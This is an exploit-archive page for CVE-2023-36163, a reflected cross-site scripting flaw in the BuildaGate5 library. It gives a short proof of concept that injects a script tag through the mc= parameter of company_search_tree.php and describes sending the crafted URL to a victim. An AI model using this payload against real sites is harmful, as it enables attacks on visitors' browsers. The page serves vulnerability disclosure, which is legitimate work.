BuildaGate5 Cross Site Scripting

BuildaGate5 Cross Site Scripting: Posted Jul 11, 2023; Authored by Idan Malihi; The BuildaGate5 library suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2023-36163; SHA-256 | cc7f52d929255d8a156c7d167fff822b4dafeaafc382528ba23b8bd3d31b7a06; Download | Favorite | View

BuildaGate5 Cross Site Scripting

# Exploit Title: BuildaGate5library - Reflected Cross-Site Scripting (XSS)
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: None
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36163

#PoC:
An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
'><script>prompt("XSS");</script><div id="aa

After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.

#Payload:
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa

Top Authors In Last 30 Days

Red Hat 185 files
Ubuntu 89 files
Gentoo 23 files
Debian 20 files
tmrswrr 8 files
Amit Roy 4 files
Aslam Anwar Mahimkar 3 files
Jann Horn 3 files
ron190 3 files
bRpsd 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,074)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,523)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,242)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,193)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,636)
UNIX (9,424)
UnixWare (187)
Windows (6,665)
Other

BuildaGate5 Cross Site Scripting

BuildaGate5 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

BuildaGate5 Cross Site Scripting

Share This

BuildaGate5 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems